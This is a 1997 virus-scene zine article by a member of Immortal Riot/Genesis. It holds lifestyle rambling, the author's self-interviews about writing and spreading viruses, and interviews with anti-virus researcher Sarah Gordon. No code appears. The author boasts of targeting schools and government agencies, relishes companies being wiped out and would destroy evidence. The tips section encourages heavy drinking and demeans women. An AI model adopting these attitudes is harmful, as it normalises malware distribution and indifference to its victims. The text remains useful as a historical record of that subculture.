-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* *
* % Diary - Present future to forgotten past % *
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *
* v 1.1 *
* An Immortal Riot/Genesis orignal *
* (c) 1997 The Unforgiven. *
* May freely be quoted! *
* *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Index of this article:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
þ Introduction
þ Things to do before physics.
þ Red Hot Chili Faces
þ The early Insane Reality - Insanity or Reality?
þ Current life & general adult hints
þ Satisfying one's ego
þ AV-Interview
þ IRL-Papers
þ The horror!
þ Gimme more cheese please
þ Eugene K
þ Side-effects the conversation way
þ Scene-Zines
þ Greets
þ Credits
þ Goodbye's and cya somewhere.. somehow.
þ Quatations & Poetry
þ Future
Introduction
~~~~~~~~~~~~
Mgl (Mengele.(P)hD?) told me he was about to release a newsletter,
and asked me kindly to contribute a little something to it. He
had nothing in mind what I do for them (I said no to source-code
contributions since I didn't feel like decreasing the code quality)
so I just had think about something myself. Well, this is the result,
perhaps nothing really worth wasting any time with, you decide.
My nature is to please anyone whenever I can so don't held me responsible
for you losing your faith in humanity, society, god or whatever. If someone
want me to write just something, surely I'll do it. If he would've
asked if I could give him a blow-job, I would though have turned down
the request.
This contribution from me is styled VLAD-AF article.2_5 because I find the
scene way too serious and that article a good read (Yay. I wrote it ;)).
This mean this can be seen as a early valentine issue from myself included in
the asterix#1. Or it might just bee seen as wasted bytes dedicated to
wasted souls.
Notice that the rest of Immortal Riot/Genesis has nothing to do with this
stuff at all. I assume personal contributions is allowed to other zines,
specially since MGL contributed to IRG#8. Also important to mention is
that none of this stuff (I guess) would make it into an IRG-sinze due to
our new technical styled magazines which I hope you all did enjoy!
So... This is from all of me, to all of you - whoever you are.
My dog surely will like it, but an updated interview with him won't
follow! Parden me.
Deadly serious ironic/sacrasm-ish reading and happy '97!
- The Unf�rgiven
Things to do before physics
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Before I continue writing I'd like to take the opportunity to mention
a few things that perhaps could easy my burden.
1). Time to spill out the beans... But who wants to eat them anyways?
---------------------------------------------------------------------
I'm as for the moment writing & doing reserch on an article about
"why viruses are written, for who they're aimed, why viruswriter's keep
on doing them, personal motivation for viruswriting, why you once started
and what you find facinating (or at least interesting) with them."
So, I'd like *every* writer of computer-viruses to email me and write a
little something about the above mentioned questions. If you feel like
adding a few things that you find interesting go ahead, let your mind go wild!
You can be anonymous if you like but don't forget to mention that!
This article will hopefully (most likely) be included in our next issue of
Insane Reality - IRG#9.
My email adressess are:
tuir@hotmail.com
tuirg@hotmail.com
tuir@hehe.com
Notice also that those system's is rather instable, but if you
read (II) you know I also can be reeched on that adress
( (II) is 9 lines below this line ).
2). Part II - Where you rather not want your daughter to be late at nights...
-----------------------------------------------------------------------------
On http://www.algonet.se/~iridium there are some IR & IRG files located
(ir.html is the file located on that adress btw, if that is for any use).
It's not an offical IRG page but all of IRG.SE know the homepage operator
and he kindly borrowed us some HD space. Every swedish IRG member can also
be reeched on that adress - just email iridium@algonet.se and he will
kindly CC (that is abbreviation for _carbo-copy_ if my memory isn't
totally phucked) them to the correct person. Notice though that the
official IRG-page still is located on:
http://www.geocities.com/SiliconValley/Park/9595
3). I'm just an inspiration for birth-control...
------------------------------------------------
My submission (other word for contribution Quantum told me ;)) to
VLAD-AF (Vlad-April Fool's Edition) called "IR#8" contained a little
challenge - namely to crack "File Encryptor". Well, Sepultura found
out the 12 byte long key which was "tuir@MAR.C0m" (w/o the quote-marks).
The april fool joke from me was that secret.txt never did gave out my
real information nor it did contain the reasons why my handle was
The Unforgiven. For those who wonder.. keep on wondering! I doubt that
it has something to do with suicide though, which some brave writer
believed.
Also notice that Quantum never did hack immortal.se (since it doesn't
exist), and ripped "IR8" from there, it was a submission to their zine
from me, pretty much like this is ;). He wrote that information at the end
of the article. Well as I figured you never did read the entire faked
Insane Reality #8 ;) and believed him. April sucka. I hope you reech
the end of this one :).
Red Hot Chili Faces
~~~~~~~~~~~~~~~~~~~
Hmm, I don't quite know where to start, but I would like to comment
a few personal things at this entry.
There are a few good reasons why I didn't contribute much to IRG#8
and beside being very busy with life, university, my gf and the
general irl-stuff I re-read the IR-zines and felt terrible embarrased
for them and felt like writing no more. For example, I started to write an
article called "What good side-effects viruswriting can result in", but
gave it up. It became too personal, abstract and complex. And beside this,
it turned huge. A short summary of my results might still be included
here or elsewhere since it's a rather interesting topic. So stay tuned.
The early Insane Reality - Insanity or Reality?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, both really. They're insane, yet real. I was red-phucked-up
in my face and my heart went ape while reading some articles,
specially those which included stuff written about girls and politics.
And yea.. those viruses too. *Sigh*.
Also worth to mention, I wasn't too pride too see some text-strings included
in my viruses or in programs included as hex-script in some zines.
(One example is "lord0.com" in IR#7 (reality.010 among with basicly,
the entire adventure of porno)). For those who've been harassed, I'm sorry.
Hrm, about some articles...
Really, who're interested in reading about some Maria, some Ellinor,
some Anette or some other girl? Who're really interested in reading
about a confused teenager opinions about something that he cannot
express properly in english? Who really bother about a person who
ramble on and on and on (like now) without giving any information,
just pure junk? A real rnd_garbage generator, or so? However,
for those who really are interested in my and my life, junk stuff, etc.
paradoxal enough I won't let you down, but this time write about something
that I can be proud of and still will be proud of when I read it in let's say
3 years. However, it's still junk though. Do I never just give up?
Current life & general hints, advises and shit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Current life is cool. I study and spend most of my spare time with
my close friends or with my gf (name won't be mentioned) who I've been
togheter with about half a year (so far).
Hints in life is have plenty of sex. If you consider yourself too
busy or "too of something else.. " change opinions. Nothing is
as relaxing as it. It's though not good to became a "sex-addict",
since most addictive things is bad for you, sex being the exception as
long you have semi-control over it (having sex with yourself w/masturbating
5 times a day isn't the way to go). Not only is sex great but to really care
about someone rocks. Don't let your life miss this.
If you smoke just give it up. It smells bad and it won't do
any good for you. Smoking at parties is alright but it doesn't really
impress on most ladies. Socially smoking is great, but socially
being decently drunk is also a killer, so.... it isn't perhaps the best
way to deal with things'n'shit anyways.
Alcohol. ch3-ch2-oh. This rocks. Don't be sober too damn often.
Home made whine can rock (and beside it's cheap, it's a good
hobby...).
Astronomy. Really interesting and is a great thing to discuss, philosophy
and crapp on about after a few beers. Only a few things can be described
as complex or simply as this.
Driving-license. Freedom costs. But damnit, it's worth it.
Cooking. Everyone likes to eat, be sure you can do magic in the kitchen.
Don't rely upon girls to do this for you. Not being dependant on
other persons is essential in life. I only wish I could describe my
situation as "not being.. ". Bah, isn't money to key to everything?
(yes, that might as well include the r@@t of evil, too)
One Half. A really good virus, lack bugs and contain a really cruel
original payload. This issue includes the original source code.
Suede - Coming Up. A really cool album, maybe the best album any
U.K band ever produced. Sgt.Pepper from Beatles might just be
up there.
Ford Fairlaine. "Eih.. I fucked him!". Great fucking movie if you ask me.
Up there along with Eddie Murphy's RAW.
Hotmail. Well, any anonymous mail-system is great if you feel like
giving your teacher some soft of feedback (critism can be kind of
sensitive, just trust me..). Http://www.hotmail.com. A cool rerouter
can be found on http://www.starmail.com (tuir@hehe.com is one of
those catchy phrases..).
Burger King. Just so much better than fucking McDonald's. Not a good
place to work on I guess but for lunch (not date-dinner though!),
it's more than OK.
AVP anti-virus. Love the demo-section. The scanning/cleaning capabilities
is also really impressive. Along with its code-analyser. If only it would
ran a little bit faster on my machine.
Java, html and high level languages. Well, assembler is cool, but I
sincerly doubt it will get you any wealthy. Internet and its
applications is what brings you money. Developing things fast is
what companies want you to do.
Irc. If used properly (i.e. not sitting there wastening all your
spare time) irc can be as good as a scrink depending on which
people you have a conversation with.
Money. I have stated that greed is your worst enemy, so watch out.
Money tend to change things, beware so it won't mess you up. Might
just solve your problems better than booze. Booze solve things
by its nature ;), problems is not included though.
Drugs. If you're afraid to face the reality, change your situation,
don't flee from it with drugs, computers, irc and shit like that.
If you can control your use, it will sooner or later turn into abuse and
you should give it up asap.
Clifton Classic clothes. A sleep-over, black jeans (or ordinary
Docker's if you prefer that) combined with Sweet Georgia Brown
hair pomade looks nothing but great.
Insane Reality. For whoever find low-level assembly programming and
virus-related things interested this is zine to get ;). Hehe, just
had to mention this.
l�ve. If you don't find someone else to love that loves you back, be sure to
love yourself. It's great to have a massive, yet humble ego.
Studies. Can be quite hard. Compared to life and work it's though not as
hard as you once believed.
Isaac Asimov. Truely a smart writer. The books about the "Foundation" and
"robots" are good and cleverly written. Something useful to waste your
time with and might just get you interested in astronomy.
Acqua Di Gio Giorgio Armani. Going around stinking bloody Farenheit or
some other highly common eau de toilette or after shave always manages to
upset someone. Be original and expensive in your choice of scent.
Coffey. Keep your awake during studies, during hacking, during
coding. Sleeping is such a waste of time, really.
Oxygen. Can't really without it, however some early viruses early
in the world's timeline could.
Overrated things
----------------
Hitchhiker's guide to Galaxy. Isn't all that great, really. Has a few
points, but not worth 900 pages.
Windows/95. Everyone know this OS sucks, howcome everyone is using it?
Swedish chicks. They aren't all that neat. The majority is just plain
trash most of the rest is average. A minority is something to have
in the long run. Of course, one doesn't realise this on a 1-2 week
long vacation.
Sleeping. Everyone likes this and it's essential it's said. But, really,
it is like wastening a 1/3 of your life with.
Opinions. Who will listen to you anyways? Who need goddamn opinions?
Why are you even reading mine?
Technology. Science should be fiction/not truth, dreams/not reality
and so on.
Neuromancer. Another book not worthy its reputation. William Gibson
just ain't no good author.
Action movies. Do I have to comment this?
Satisfying one's ego
~~~~~~~~~~~~~~~~~~~~
Here's an interview I filled out for Richard Loearker's book. It will
be an anti-virus reserach book and I do encourage every viruswriter
to erase my answers, fill in your answers yourself and send it to
rilo@xs4all.nl. If you want to add more questions to it, that is
fine, too.
I know this is lame, egoistic to include an interview with yourself,
but this ain't no popularity contest. Do me your worst. Personally,
everything I've ever written is horrible this piece - I see as
the exception (i.e. the interview) but that might just change if
I re-read it in a year. Well.. most things tend to change.
================================================================================
What is your handle?
My handle is The Unforgiven.
How did you get your handle?
I found the handle on one of Metallica's albums and decided to take it.
I liked the song and the alias did somewhat fit my person. I don't know
exactly why, but metal-music has in a way or two always
inspired viruswriters so it seemed to be a natural handle to occupy.
How old/young are you? (Approx. If you won't want to be specific)
I'm 21 years old.
Would you dare to give me your first real name? (Do if you want to,
don't if you don't want to)
Sure, that would be no problem ;-).
How would you describe yourself?
I prefer not to since your readers would probably think of me
as some sort of bragger. Ah well, I think I'm a pretty ordinary young
adult who is a part-time enjoyer of life.
As for the moment I'm studying on Chalmers University of Technology located
in Gothenburg (Sweden), and will hopefully be for quite some time. I've
worked with various things during the previous year, among many things
computer-security. Although I liked my job I decided to get back to school
after a moment of clarity.
Socially I'm really not very complicated. I live a healthy social life with
really good friends and with my girlfriend who's always there for me.
I believe I'm very spoild concerning this kind of things.
How do your friends and people around see you like? (BE HONEST! ;-)
I am not a mindreader, but I do however believe that most people have
little or no trouble with my humble person. Of course, there is always
exceptions and honestly I don't deserve to be liked by everyone.
Hopefully all that is in the past, but who knows? Cruelness is one
mean habit to kick. It just won't walk away all that easy.
I always try to care for persons who care for me and I'm always
interested in getting to know new persons. Maybe are those the
reasons why people accept me for who I am.
Since when did you get involved with virus writing and how did you
became interested in the first place?
I became interested in viruswriting somewhere back in 1993. Me
and a friend started Immortal Riot - mainly a viruswriting group,
and I had to start to learn assembly.
Since when did you get involved in a virus authoring group?
When I started the group, of course.
What made you decide to join this group?
I didn't join Immortal Riot, I created it.
I don't though know exactly why I formed yet another viruswriting
group, but it seemed like a great fun and I tried it out.
How did this group get its name?
I don't have a clue. It did sound cool.
What are the reasons for you writing viruses?
I'm totally clueless! There aren't many good reasons really,
but viruses facinated me and I wanted to learn more about them.
The best way to learn more about viruses is to write them and so I did.
What is the main purpose of the group?
To write new good undetectable viruses, supply the masses with
virus related information and knowledge for whoever it may concern.
One of our goals in the beginning was to learn the shit ourself
and teach echother the knowledge achieved. Ah well, mainly the
purpose of a viruswriting group is individual. I doubt we had
any specific purpose really, mainly it was just a fun thing to
waste your time with.
Approximately, how many viruses have you written?
I couldn't count all updates, new versions and so forth. The viruses
released in the wild and which has infected computers around the globe
might be around 30.
Which viruses were a real challenge for you? (Masterpiece?)
When I finally got the knowledge to write some good virus I got
unmotivated and grew bored with it. Mainly I wrote viruses whenever I
felt like tormenting some computer geeks or when I was really upset about
something. Nowadays, I've calmed down or maybe I just got better things
to do with my life? Who knows, I might give it another shot, sometime.
Have you written any virus toolkit or add-on?
No, I don't think so.
Why have you written this toolkit or add-on?
..
What kind of reactions did that program get?
..
What's your attitude towards antivirus researchers and why?
I've no problem with most of the guys "on the other side" and most
of them do deserve some respect. Some of them have though some serious
attitude problems with viruswriters, but honestly I couldn't care less
about them. Some persons have problems with everything and this just ain't
my burden.
Give me some opinions about and his product. If possible,
motivate.
Frans Veldman (Thunderbyte Scan)
Frans Veldman is a really good low-level programmer and TBAV is
a technical excellent product.
Dr. Alan Solomon (Dr. Solomons Antivirus Toolkit)
I believe Dr.Solly has a huge identity crise or just heaps of problems
with his very own person. I havn't looked closely into his product,
but he ain't programming on it himself so it can be good.
Fridrik Skulason (F-Prot)
I like Frisk a lot! His product is excellent and I recomment F-Prot
for everyone who are looking for an anti-virus program. Fridrik himself
is a very nice person and he's also a lot like "us" but older. He
once stated in an email to me saying "viruswriters are a lot like me
15 years ago,", I like him for being honest.
Also notice the comma in the quote before the quotation mark ends.
Well, let's just say I'm trying to act as a reporter.
Eugene Kaspersky (AVP)
AVP is a good product, too. I don't know very much about Eugene but
I want to believe he's nice.
others you would like to give your opinion about? (ME? Naaahh)
Nah, I wouldn't waste my time to write anything about John Mcafee
since everyone knows his product (Scan) sucks bigtime and he's a fake.
What is the best line of defence against computerviruses and how would
you implement it?
To remove all floppy and harddrives and never copy anything? :-).
Honestly I don't quite know. No system is 100% safe against virus attacks.
Personally I like resident monitors and recommend other persons to use them
if they're afraid to get a virus (I believe the TSR monitor called F-Prot
Gatekeeper is a good choice). Some sort of scanning software is also good
to execute once in a while..
Would you like to work for an antivirus company as
researcher/troubleshooter? Why or why not?
I would have no problems with that. Would be quite ironic and I couldn't
say I wouldn't like it before I had tried it out.
If someone turns to you for help when his computer has a virus, would
you help him? Please motivate why or why not.
Sure I would. That would perhaps increase my knowledge about these
little things and on the same time I would get the other persons
respect. I've done this several times during the past years.
Would you ask money for your help?
Of course not. I dislike greed.
If it turns out to be a virus you have written, what would you do?
This too has happend :-). I gave out all technical details about
the virus (trust me, they got really impressed) and wrote a cleaner
for it. Voila! Respect earned in a cheap way!
Would you still ask money for your help?
I wouldn't in the first case, so... No, I wouldn't. But I would
offer them the source code (claimed disasm :)) for further
investigations.
What would your initial response be if you see a newspaper that
describes your virus wreaking havoc in:
A government agency?
First I would first laugh my underpants off, but then I would be a little
bit worried about it. My handle/real identity is pretty known afterall
so this could get me busted. I think I would destroy all evidence so
they couldn't prove shits.
A hospital?
That depends. I wouldn't like to see someone getting hurt physically
by a virus of mine but if it just had infected some of their computers
or trashed some easy to recover data I'd have no worries with it.
Of course this is bad publicity, but I can live with that.
A large company?
Yummie! I like all daily newspaper reports concerning companies getting
hit or (prefered) wiped out by a virus of mine. I would be happy a
day or two then I would forget all about it.
A small company?
I couldn't care to discriminate between large or small company. Of
course I would like this too.
What would your initial response be if this company went broke due to
your virus?
I would silently say "Woops, better not trust computers, geek." and
get paranoid about the consequenses. Surely, they would want someone
hanged.
What would your initial response be if someone dies in the hospital due
to your virus?
Shit!
Really I wouldn't like this to happen. I'm not a weirdo. I would
probably think about this a lot and after quite some time come to
the conclusion that it was all an accident and not, - not even indirectly -
my fault. Then I would try to forget all about it and blame the dead
vegetable on someone else.
What would your initial response be if the government loses all police
arrest records due to your virus?
Voila!
This I would indeed like. But then again, they wouldn't report this
and just restore the records from backup's. If they had no backup
I would thing twice about the effects this kind of incident may bring
and get really paranoid.
How is the law in your country concerning computer viruses and what is
your opinion about it.
The law is a complete mess.
I can understand if deliberate spreading of computer viruses is
considered a crime in some countries, but writing? No way!
And how easy is it to prove that I deliberate did spread a virus?
Most laws about viruswriting has a large amounts of flaws. Surely,
with a good lawyer you will get away with it. Sweden hasn't for
the moment any specific law which forbids this.
Have you ever been arrested for doing illegal things with computer
(viruses, phreaking, hacking)?
No. I have never been arrested for anything. Aren't I too legal? :-).
Has this arrest altered your view of these activities, and, if so,
please describe the stage you went through.
..
Would or do you write antivirus software?
No I wouldn't. I couldn't make money outta it anyways and just writing
one for fun is a waste with my ever decreasing amount of spare time.
I have though written cleaners against viruses reported in the wild.
It's for no use to have a product detecting 10.000 viruses which aren't a
real treat.
If so, what kind of software has your main interest?
TSR-blockers, scanners & cleaners.
What would you like to say to antivirus persons if you have the chance?
"Hello". Which is a good first word to start a conversation with.
What would you like to say to new virus writers that are getting in the
scene?
It's not really worth it and maybe it's only a waste of time for everyone.
In the end nothing what you are doing now counts. Find something better
to do and get on with your life without the scene. It won't do shit
for you.
What are you planning to do in the future with the knowledge you have
now about viruses?
Frankly said I don't quite know. I had use for the knowledge gained
from the scene and from friends in the scene. However I would like to
believe that you have use for anything you ever learn, so it's not
really such a big deal afterall.
I'm as for the moment writing an article about what good side-effects
viruswriting may have (on personal basis), but as for anything concerning
the future, you just don't know.
Do you think that writing viruses was a good descision for you to take?
Please motivate why Yes or No.
I wouldn't know. I could impossible know what would or could have
happend if I didn't. I only know my situation as for now, but sure
I like my current life.
This interview will be put in a dutch antivirus book. What do you think
or hope what people that read it will learn from you? (Example, virus
writers are nice guys or that it's just an intellectual challenge,
whatever. Let your fantasy run wild).
Anything I left out here? Please write the things you want to say to the
readers here below.
================================================================================
% This is damn lame %
---------------------
To: amars@slack.demon.co.uk
Subject: Sorta humble.
* Any idea why all virus writers (and hackers for that matter) seem to be
* male?
TU>
Sure, males seem to like technology more than the opposite sex. If you don't
look at computers, arcade-games, etc. seperately but on technology
in general, it's (unfortunately, perhaps?) male dominated. Also important
to mention is that most programmers are male and since it takes some
programming knowledge to write computer-viruses that's quite a good
reason.
* Why do you do it, what satisfaction do you get out of it?
Viruses are interesting and a funny thing to know/learn about I don't get
anything out of it more than (further) knowledge about computers, programming
and so on. Of course, I have met quite a few friends related to viruswriting
but that's pretty much about it. I don't see it as something important it's
just another hobby.
* Would anything make you stop?
TU>
To give up writing viruses is not hard really not compared to giving
up smoking for example. I would stop writing viruses if my real life
get damaged by the time consumed writing viruses.
* How old are you?
TU>
I'm 22 years old.
* How long have you been writing viruses?
TU>
I believe I started writing computerviruses somewhere back in 1993,
not quite sure though.
* What got you started?
Viruses did facinate me and that's how I started I think, don't know for
sure though.
* What do you for a living?
I'm a student but have worked with various things, economics,
computer-secururity and so on.
* Which viruses have you written / modified?
TU>
A lot really, I couldn't name them all, probably circa 30 of my
creations have been reported in the wild. Examples are Hybris, Petra,
Eternity, Intellecual Overdoze, the Riot and the carpe_diem series and
so on. I often did write a special-designed virus to spread for a special
purpose and have helped other viruswriters distrubuting their viruses too.
To name a few: Manzon, Diametric/Matricide and Word.Nuclear. Manzon was
reported from everywhere in 1994/95/96 and I did the petra-rm.zip which
it was being distributed in.
* How do you initially distribute them?
TU>
Mainly I did spread them on different bullentin board systems but I also
targetted special schools/government agencies I did not like and of course
the internet is an excellent place to spread viruses on.
* What do think of those who only send a virus to the AV companies
but don't release them to the public?
TU>
They're alright.
* How many other virus and anti-virus authors do you know?
TU>
I know many viruswriters and have met a lot writers in real life,
maybe I've met about 10 or so.
* How do you communicate with them?
TU>
Mainly via the internet relay chat (irc) or via phone. Some are also my
friends but I don't really consider them "viruswriters", they're just
ordinary friends.
* Are all virus writers alike, or do you considers some more ethical than
others?
TU>
Viruswriters are not really alike trust me on this on - I have done
quite a large study/research about this very topic. Sure some writers are
more ethical than others but this isn't related to computers at all.
* If so what makes the difference?
TU>
Behaviour towards other people in general.
* Have most virus writers also been/are hackers?
TU>
More or less. Hackers is a vague definition you know.
* What do you think of the 'hacker ethic'?
TU>
Couldn't give a shit about it. I have my very own ethic of what's right
and wrong.
* What do think of the laws in most countries that make deliberately
releasing a virus a criminal offence?
TU>
Releasing a virus deliberately could be considered a criminal offence,
I can agree with that. As long as they don't forbid the writing itself
it's alright with me.
* Could viruses ever be used in wars or terrorist attack? How?
TU>
Why not? A virus monitoring the TCP/IP protocoll to collect military
information could be quite helpful in wars.
* Do you family / friends know of your hobby? (Do you see it as a hobby?)
TU>
Sure it's a hobby. Some of my friends know about it but they really don't
care. I think I've told my girlfriend about it but she isn't
really interested in computers :) and it wouldn't give a shit anyways.
* If so what do they think of it?
TU>
They don't have any problem with it as long as they don't get hit by
a virus of mine. I don't discuss viruses personally if I don't have
to.
Regards,
The Unforgiven/Immortal Riot/Genesis.
================================================================================
AV-INTERVIEW
~~~~~~~~~~~~
This article, I believe was suppose to be published in IRG#8 but
it wasn't released then. I believe it was done erm.. early in
1996 :) so, it can as good be nearly a year old :-).
Sarah Gordon can be reeched on sgordon@commandcom.com or you
can see her cool work on http://www.commandcom.com/html/virus/virus.html.
Here it follow anyways,
enjoy!
a '>' Dark Fiber
no '>' is Sarah.
Also mention - another interview with Sarah Gordon done by me is published
below this.
---- ALL CREDITS TO DARK FIBER ----
> heya Sara,
sarah. hi :)
it was sara long time ago, for reasons i have explained so many
times i wont bore you with them again :)
> Lots of interviews exist with virus writers, yet
> few exist with those on the av side of the fence, so I was
actually there are probably more with av than v now. virus bulletin
has been doing interviews with 'us' for some time. jimmy kuo from
mcafee is the latest.
i think it just depends where you read..
> wondering if I could throw some questions at you?
sure :)
> First off, can you give me a brief description of who you are
> and what exactly do you do?
who i am: sarah
what i do:
you mean related to my work? one of the things i do is replicate viruses. it is
quite a boring and tiresome job, so if you would like to encourage everyone
reading your magazine to STOP WRITING THEM, i would really appreciate it.
i don't suppose you will do that, so perhaps you could ask them to please
not give them to anyone (or publish them in your magazine), because it
is very irresponsible to do this. and, it makes more work for me, and costs
users lots of time and money. that said, i'll tell you more what i do.
i do research and write papers on topics related to viruses, security,
ethics/education/technology. i present some of these at various types of
conferences. some teaching / seminars. lecture at universities. work
with groups developing formal methods for product certification. also
working now on a small project involving designing IT security for
developing countries. maintain virus library, perform various tests.
that is as brief as i can make it and still include at least half
the things i try to do. its not a real 'firmly defined' position.
basically, i do whatever needs to be done. sometimes that could
mean talking to a user, a journalist, or it could mean helping
clean up after a company get-together. sometimes i am at the company
booth at conference or show, to talk with people. it really depends
on what needs to be done.
> What's the extent of your education with regards to your work?
> ie: self tought and picked up the lingo as you went or the full blown
> uni degree bought by your parents, etc?
well it is not the case that my parents paid for anything :) i
have supported myself for a long time. since way before college.
i also would NOT recommend anyone go about it the way i did. there
has to be an easier way.
intially, academic scholarship and nomination to The Deans College.
did not study computers there.
then, a long time off from that ...working with juvenile corrections/LE,
homeless kids, runaways..going back to school (med school), leaving
when i saw the attitude some of the other pathology group had, working,
then ending up with a computer. i liked the computer :)
'formally' [at university-again] [after hiatus]
now, on computers, i have the basic classes, (you know the type) and
some higher level. some research hours. research grant eventually.
intership related to computers and security. (the internship was
*way cool* and if anyone can get such opportunity, they should
take it. )
about viruses, though, i had to learn on my own. and i must say
i did it without writing/releasing any. so, i know it can be done :)
so , i guess its combination of 'formal' and 'informal'. the
formal is *important* and i wish i had done it earlier. but, the
'informal' can be helpful.
> How have your attitudes changed since the first time you were infected
> by a virus to present day?
the first time i was infected, it took me some time to realise. i
was irritated but intrigued. now, im just irritated. i dont see any
point in causing all this problem for users. its such a waste of
everyones time really.
> There was a well know opinion of you and you work, namely the Dark Avenger
> article, then came the NuKE Info Journal and Khontark/PHRACK tangles. Do you
> feel these events made virus writers more standoffish towards you and your
> work?
it seems not. i mean, why would it? the dark avenger piece was honest,
and i only submitted what he said was permitted and what he wanted in there.
i can't help what someone writes, say, in NuKE, or that nonsense Kohntark
was going on about. i think most people saw the silliness in that
kind of thing, and many of them told me to not worry about it. much
of the 'support' i got when some of those guys were acting so crazy came
from virus writers :). so, i think the answer to your question is no.
> Which of all your articles has been the most requested for publication?
im not sure what you mean. do you mean which of my published articles
is most requested? i cant know that as they would be requested from
the publishers. if you mean which do i receive most request for
copies of, probably it would be the generic virus writer right now.
but last year it was the IFIP paper. and this week its the paper on
virus simulators. and, after a conference it is the one on whatever
topic im talking about. i dont think there is one
consistently most requested.
> You did a study into the Generic Virus Writer some time ago, do you think
> much has changed since the initial study to today, giving that those in the
> study would have grown up now? Do newbies of today fit into the same category
> as the newbies of the study, regarding mentality, age, etc?
this is something i hope to address in the followup paper :) i
can say i am observing some changes, but specifics will have to wait.
> Your now working for Frisk, What's your role in that company?
i am? that is news to me...i work for command software systems.
if i am working for frisk i am living in the wrong country! :)
of course, i work for them -because- of frisk, i think a lot of him and
the product. my role is described in an earlier answer i think.
> Do you think that in 2 years time you will still be active in the
> anti virus scene?
probably.
did you know, if you stopped writing viruses *now*, if -all- of
you stopped *now*, i would still have a job in 2 years? so,
please don't feel you need to keep going just for me.
> If the av went by handles, what would yours be and why?
i have had a handle since years, it is theora. most of my 'circle
of friends' (so to speak) on the internet know it. i chose it some
long time ago when i ran a bbs (which i wrote) called Network 23
(after the Max Headroom network). its funny, i always thought the
characters name was Fiora, and so for the first 6 months or so,
I used that instead of theora :). but anyway, its theora.
however, i don't hide behind it. by the way, whats your
name?
> You want to add or comment on anything?
no. i hope this answers your questions well enough. if you have
any more, please feel free to send.
================================================================================
% INTERVIEW WITH SARAH-GORDON DONE SOMEWHERE IN END OF MARCH, 1997 %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> first of all, i would like you to give me a personal character
> presentation about yourself with your own words. then, secondly,
> (be honest), i would you to write how you think other people
> around you, see you as.
personally, i try just to be honest, thorough, compassionate, and loving
person. i try to not make judgements or draw conclusions without thinking
them through, and i try to be fair. (note: i did not say i dont make judgements
or draw conclusions. i said i try to think them thru and be fair. i see nothing
wrong with a person saying 'i like or dont like this or that and here is why',
or 'this or that is wrong, here is why'. i am not very good 'game player', and
usually just say what i think. since sometimes what i think may change, this
can be a problem :)
my priorities in my personal life are relationship to God, to my husband (i
was recently married as you may know), to my children (who are grown), to my
friends, and then to my work. at least, in theory this is the case.
how i see myself?..hmm, well, i try to adhere to what i think is important,
but i do not always succeed.
how others see me, well, you would have to ask them :). but i think sometimes
some people have pre-conceived ideas, or want someone to fit a certain mold
they are comfortable with....so they put me there. when they do actually take
the time to know me, they often find out they were wrong. i think also this
happens with many people, not just me. (it could be they find out they
were right :)
yet others, usually those who are professionally competent and secure, don't
have these problems -- they see the bigger picture and have no need to create
artificial life-model of another person :) (no pun intended).
i am told that i have no sense of humour and that i see things 'differently',
whether or not this is a benefit is an exercise left to the reader.
> about your articles, what gives you motivation to write them?
well, i write different kinds of articles, and the motivation is different
for different ones, at different times.
i write about something if it interests me, and if i think i may have some
idea someone else may not have thought of. or if i see something written i
dont agree with.
i have written several for money, but they are usually technical security
articles, nothing to do with viruses or virus writers, or any of that.
sometimes it is nice to deal with 'non-people' issues, there is a lot less
room for 'controversy' :)
> and/or the virus-community with your write-ups? (if yes, motivate
> what.. ).
sure, some have changed. i mean, now they are talking to each other
instead of just name calling. i think i played some role in that.
well, i know i played some role in that. but my 'role' was just to
initiate change, as some form of catylst. don't you know, usually the
catalyst gets burned the most :)
there is now more examination of facts, instead of hype and hysteria,
related to virus writers. i know i played some role in that. all in all
this examination is good, for both sides of the discussion.
i think virus writers are now thinking and talking more about what they
are doing and want to do, and realising the impacts of releasing their
creations. im told i have had some role in that. but i dont know.
i hope i did. but it could be natural sequence of events. maybe i just
recorded/documented it. maybe i made some change by doing that...i don't
know. i know personally i have had some impact in the overall dynamic, but
how much and how to measure is difficult.
many times now im quoted about what ive learned by just talking to people and
analysing facts about how viruses really spread. hopefully this has some
effect on getting the media to focus on real problems.
but virus writers and things related to them are just small portion of my
work. ive done more in product testing, certification and network security.
however, it is the 'virus writer' work which seems to grab some attention.
> something you have written/worked about that has been misunderstood?
sure, this is always the case with everyone isnt it? havent you? :)
in particular, i remember when phrack wrote some story which they later
said 'we're sorry, we didnt check this out thoroughly' about my trying to
shut down some bbs. its true i was in a room when someone suggested that
some bbs should be closed, but if i remember correctly, i suggested this
is not a very good idea...
then, there was that ugly silliness the virus writer kohntark made up.
i never did figure out why he did that, but he seemed to have some 'model' of
what i must be that he needed to fill. well, and he did say he wanted to
be famous. and again, that got straightened out but only after he was really
personally very nasty to me. that he chose to act this way was a disappointment
to me, as i think he and i could have had some interesting talks about real
things.
its dificult for me, when i know i didnt do anything
like is said/written, to understand how anyone can say these things. and,
sometimes it hurts a lot to have this happen. but on the other hand, i dont
really care. i mean, there are far worse things in this world than this type
of thing.
usually it is wanna-be's or those who are relatively new to the various scenes
who are nasty, but its not always the 'bad guys' that misunderstand. many times the
'good guys' get the initial idea im saying something totally different than
i am -- because they also need to 'fill in the blanks'..and its been hard for
some of them to admit they were wrong about the people involved in some of
these subcultures.
[then of course there are people like gheap and dark angel :). my two
most bitter enemies in this known universe :). not to mention...well, better
to not mention :) those guys bad mouth me all the time. all i can say
to them is 'h0h0h0h0h0' :)]
> do you consider yourself being "un-payed" (uh.. not having enough
> payment compared to the job done by you.. )? and what do you earn
> per year (circa.. ).
salaries are something i cant discuss. but i can say i make more than
when i was undergraduate researcher at the university :)
> if you had to chanse to say at maximum 100 words to everyone
> involved in writing viruses, what would that be? (if you answer
